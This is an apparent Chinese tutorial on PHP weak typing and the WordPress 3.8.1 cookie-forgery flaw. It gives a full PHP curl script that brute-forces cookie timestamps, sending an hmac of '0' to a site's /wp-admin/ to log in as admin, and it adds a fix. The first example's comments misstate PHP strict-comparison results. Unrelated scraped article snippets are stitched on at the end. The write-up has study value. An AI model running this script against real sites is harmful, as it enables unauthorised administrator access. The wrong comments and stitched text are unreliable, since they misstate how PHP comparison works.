PHP弱类型:WordPress Cookie伪造

1 PHP弱类型

  PHP是弱类型语言,所以变量会因为使用场景的不同自动进行类型转换。PHP中用 == 以及 != 进行相等判断时,会自动进行类型转换,用 === 以及 !== 进行判断时不会自动转换类型。

1 <?php
2     $a = 3;
3     $b = ‘3vic‘;
4     var_dump($a == $b);//true
5     var_dump($a != $b);//false
6     var_dump($a === $b);//true
7     var_dump($a !== $b);//false
8 ?>

 说明:在PHP中字符串转换成整型时,如果是数字开头就会转换成前面的数字(‘3vic‘ -> 3),如果不是数字开头,那么就会转换成0(‘vic‘ -> 0)

2 WordPress代码

  • WordPress 3.8.1 与 WordPress 3.8.2 部分代码区别
1 <?php
2     // WordPress 3.8.1
3     if ($hmac != $hash) {}
4     // WordPress 3.8.2
5     if ( hash_hmac(‘md5‘, $hmac, $key) !== hash_hmac(‘md5‘, $hash, $key) )  {}
6 ?>
  • Cookie 组成

  客户端后台只验证其中的一条Cookie,如下所示

wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin|1433403595|cf50f3b50eed94dd0fdc3d3ea2c7bbb; path=/wp-admin; domain=www.test.ichunqiu; HttpOnly

  其中Cookie名 wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91 格式为 wordpress_ + md5(siteurl)  其中siteurl为WordPress的网址,此处网站地址为http://www.test.ichunqiu,md5加密后为c47f4a97d0321c1980bb76fc00d1e78f,其它部分也可省。

类型      用户名     过期时间        登录成功服务器端赋予客户端的hash值

对应变量 $username $expiration $hmac
cookies admin 1433403595 cf50f3b50eed94dd0fdc3d3ea2c7bbb
  • 分析验证登录

  代码 wp-includes/pluggable.php 第543-549行

1 <?php
2     $key = wp_hash($username . $pass_frag . ‘|‘ . $expiration, $scheme);
3     $hash = hash_hmac(‘md5‘, $username . ‘|‘ . $expiration, $key);
4     if ( $hmac != $hash ) {
5     do_action(‘auth_cookie_bad_hash‘, $cookie_elements);
6     return false;
7 }

  在代码所使用的变量中,通过改变客户端Cookie 的方式可控的有 $username 用户名,$expiration 有效期,又因为其中用户名是固定的,因此只有$expiration是可控的,所以我们可以从改变 $expiration 的方法来改变$hash

  • 结合PHP Hash 比较缺陷分析 WordPress

  有以下几种可能使 $hmac == $hash 为真,字符串完全相等或者 $hmac 等于0的同时 $hash 为以字符开头的字符串; 将客户端的Cookie中 $hmac 值改为0,然后在if ( $hmac != $hash ) {的上面一行写入var_dump($hmac);die();发现打印出来 $hmac 的结果是 string ‘0‘而不是int 0, 那么有没有方法使字符串识别为整数呢,代码如下:

1 <?php
2 var_dump(‘0‘ == ‘0e156464513131‘);//true

  其中的 0e156464513131 会被识别为0乘以10的156464513131次方,还是得0;因此当 $hash 以0e开头后面全是数字时就会与 $hmac 的值为 ‘0‘ 时相等,所以我们可以将客户端的Cookie设置为类似 wordpress_c47f4a97d0321c1980bb76fc00d1e78f=admin|1433403595|0 然后不断更新过期时间(现在1433403595的位置)的方法来碰撞服务器端,一旦 $hash 的值为0e开头后面全是数字即可验证通过。假设碰撞成功,就修改浏览器的Cookie,直接访问后台地址,就可以成功登陆后台。

3 测试脚本

  通过改变客户端Cookie里过期时间的值,不断尝试登录后台,找出可以进入后台的时间戳,从而实现Cookie伪造登录后台。

 1 <?php
 2 /*
 3
 4 本脚本用于WordPress 3.8.1 的cookie伪造漏洞检测
 5 传入两个值
 6   WordPress 的主页 $host
 7   管理员用户名     $root
 8 */
 9     header("Content-type:text/html;charset=utf-8");
10
11     $host = ‘http://xxx.xxx.xxx‘;//主页地址 结尾不带‘/‘
12     $root = ‘user‘;//管理员用户名
13
14     $url = $host.‘/wp-admin/‘;//后台管理地址
15     $sitehash=md5($host);
16
17     echo "\nWelcome\n\n";
18     //通过时间戳暴力破解cookie 实现伪造cookie
19     for($i=1500000000;$i<1600000000;$i++){
20         $cookie = "wordpress_".$sitehash."=".$root."|".$i."|0;";//组合构造cookie
21         $header = array(
22        "Content-Type:application/x-www-form-urlencoded",
23       ‘User-Agent: Mozilla/4.0 (compatible; MSIE .0; Windows NT 6.1; Trident/4.0; SLCC2;)‘,
24       "Cookie:".$cookie,
25       );
26
27         $curl = curl_init(); // 启动一个CURL会话
28         curl_setopt($curl, CURLOPT_URL, $url); // 要访问的地址
29         curl_setopt($curl, CURLOPT_FOLLOWLOCATION, 1); // 使用自动跳转
30         curl_setopt($curl, CURLOPT_AUTOREFERER, 1); // 自动设置Referer
31         curl_setopt($curl, CURLOPT_HTTPGET, true); // 发送一个常规的Post请求
32         curl_setopt($curl, CURLOPT_HTTPHEADER, $header); // 读取上面所储存的Cookie信息
33         curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); // 获取的信息以文件流的形式返回
34         curl_setopt($curl, CURLOPT_HEADER, false);
35         curl_setopt($curl, CURLOPT_HEADER, 0);
36         curl_setopt($curl, CURLOPT_HTTP_VERSION, CURL_HTTP_VERSION_1_0);//让curl自动选择版本
37         $tmpInfo = curl_exec($curl); // 执行操作
38         if (curl_errno($curl)) {
39         echo ‘Errno‘.curl_error($curl);
40         }
41         curl_close($curl); // 关闭CURL会话
42
43         //匹配结果
44         if(strstr($tmpInfo,‘我们准备了几个链接供您开始‘)){
45             echo  "\n".‘success : ‘.$cookie."\n\n";
46             break;
47         }else{
48             echo  ‘fail : ‘.$cookie."\n";
49         }
50
51     }
52 ?>    

  说明:理论上32位的MD5值以0e开头的大概三亿分之一,碰撞到可以利用的 $expiration 几率极低。

5 修复方案

  PHP 中使用的哈希比较函数,将其中的 == , != 分别更改为 === 和 !== 或者 将比较的两个变量使用MD5再加密一次。

学习笔记:http://ichunqiu.com/course/167

时间: 2024-12-22 15:19:06

PHP弱类型:WordPress Cookie伪造的相关文章

php代码审计之弱类型引发的灾难

有人说php是世界上最好的语言,这可能是对开发人员来说,确实有这方面的特点,因为它开发起来不像其他语言那样麻烦,就比如:弱类型,它不需要像java等语言那样明确定义数据类型.这给开发带来了很大的便利,所有的数据类型都可以用$xx来定义,而不需要int i,string a,fload b等等这样去定义它.这样确实很方便,因为php帮助你判断了数据类型,比如整形int ,你只要$a=1;那这个1就是整形,$a='abc'那这个abc就会被php判断为字符串类型.但是弱类型方便是方便,但是带来的安全

强类型 和 弱类型

完全的面向对象要求对象是强类型的.强类型是在编译的时候就确定类型的数据,在执行时类型不能更改,而弱类型在执行的时候才会确定类型. 强类型安全,因为它事先已经确定好了,而且效率高.一般用于编译型编程语言,如 C++, Java, C#, Pascal 等. 弱类型相比而言不安全,在运行的时候容易出现错误,但它灵活,多用于解释型编程语言,如 Javascript, VB 等. 弱类型的轻量化是以牺牲开发的方便性和效率为基础的.它将一部分机器能完成的事情移到程序员来完成.例如开发同样一个功能,如果用

弱类型、强类型、动态类型、静态类型语言的区别是什么?

作者:amalgamation链接:https://www.zhihu.com/question/19918532/answer/21647195来源:知乎著作权归作者所有.商业转载请联系作者获得授权,非商业转载请注明出处. 1. 先定义一些基础概念 Program Errors trapped errors.导致程序终止执行,如除0,Java中数组越界访问 untrapped errors. 出错后继续执行,但可能出现任意行为.如C里的缓冲区溢出.Jump到错误地址 Forbidden Beh

什么是编程语言的强类型,弱类型

给你来个例子把 弱类型语言vbs: a=1 b=a+"1"+"a" //结果是11a,这里 a 成了字符串 c=a+1 //结果是2 ,这里a则是数字型 强类型语言:c# int a=2 string b=a.ToString()+"1"+"a" int c=a+1 看到了吗?区分大小写,需要实现申明类型外,一个重要的区别是,弱类型的语言的东西没有明显的类型,他能随着环境的不同,自动变换类型 而强类型则没这样的规定,不同类型间

动态语言和静态语言、编译型语言和解释型语言、强类型语言和弱类型语言的分析

一.动态语言和静态语言1. 我们常说的动.静态语言,通常是指: 动态类型语言 Dynamically Typed Language 静态类型语言 Statically Typed Language 可能还有:动.静态编程语言 Dynamic\Statically Programming Language 2.    动态类型语言:在运行期间检查数据的类型的语言例如:Ruby\Python这类语言编程,不会给变量指定类型,而是在附值时得到数据类型.Python是动态语言,变量只是对象的引用,变量a

[JS2] JS是弱类型

1 <html> 2 <head> 3 <title>JavaScript 是弱类型的</title> 4 <Script Language="JavaScript"> 5 <!-- 6 var myVar //声明变量 7 myVar="JavaScript 是弱类型的" 8 alert(myVar) //使用消息框显示变量 9 myVar=3.1415926 //为变量赋不同类型的值 10 ale

MVC 强类型传值Model。和弱类型传值ViewData[&amp;quot;&amp;quot;]。及用EF进行增删查改(母版页的使用)

<1> 控制器 </pre><pre name="code" class="csharp">using MvcTest.Models; using System; using System.Collections.Generic; using System.Linq; using System.Web; using System.Web.Mvc; namespace MvcTest.Controllers { public cla

php 弱类型总结

0x01 前言 最近CTF比赛,不止一次的出了php弱类型的题目,借此想总结一下关于php弱类型以及绕过方式 0x02 知识介绍 php中有两种比较的符号 == 与 === 1 <?php 2 $a = $b ; 3 $a===$b ; 4 ?> === 在进行比较的时候,会先判断两种字符串的类型是否相等,再比较 == 在进行比较的时候,会先将字符串类型转化成相同,再比较 如果比较一个数字和字符串或者比较涉及到数字内容的字符串,则字符串会被转换成数值并且比较按照数值来进行 这里明确了说如果一个

sqlite 的比较等运算是根据不同的值而不同的,并不是根据的字段类型,因为 sqlite 是弱类型字段

-------------------------------------------------- http://www.sqlite.com.cn/MySqlite/5/127.Html 在SQLite3.0版中,值被定义为什么类型只和值自身有关,和列没有关系,和变量也没有关系. (这有时被称作 弱类型.)所有其它的我们所使用的数据库引擎都受静态类型系统的限制,其中的所有值的类是由其所属列的属性决定的,而和值无关. 为了最大限度的增加SQLite数据库和其他数据库的兼容性,SQLite支持列